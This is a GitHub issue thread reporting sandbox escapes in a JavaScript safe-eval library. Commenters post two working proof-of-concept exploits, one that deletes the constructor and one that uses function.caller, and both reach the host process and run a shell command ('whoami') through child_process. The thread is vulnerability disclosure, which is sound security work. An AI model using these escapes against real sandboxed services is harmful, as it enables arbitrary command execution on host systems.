-
Notifications
You must be signed in to change notification settings - Fork 37
New issue
Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? # to your account
Breakout #18
Comments
@XmiliaH Just curious, I am not able to replicate the bug on node On the other node, #19 works perfect (based on your vm2 escape). |
@a0xnirudh yes, with v12.10.0 it also does not work. However there is an easy fix: const safeEval = require('./index');
const code = '(' + function (){
delete this.constructor;
const HostObject = this.constructor;
const HostFunction = HostObject.is.constructor;
const process = HostFunction('return process')();
return process.mainModule.require('child_process').execSync('whoami').toString();
} + ')()';
try {
console.log(safeEval(code));
} catch (e) {
console.log(e);
} Delete the constructor first. |
Bonus, climb up with the function.caller property const code = '(' + function (){
const key = Object.getOwnPropertyNames(this).find(k => k.startsWith('SAFE_EVAL_'));
function getter() {
const HostFunction = getter.caller.constructor;
const process = HostFunction('return process')();
return process.mainModule.require('child_process').execSync('whoami').toString();
}
Object.defineProperty(this, key, {
get: getter
});
} + ')()';
try {
console.log(safeEval(code));
} catch (e) {
console.log(e);
} |
Hi, |
@XmiliaH Thanks for the repro. That is fairly scary that this is unpatched with so many downloads every week! |
It is possible to get access to the hosts process object as shown in:
The text was updated successfully, but these errors were encountered: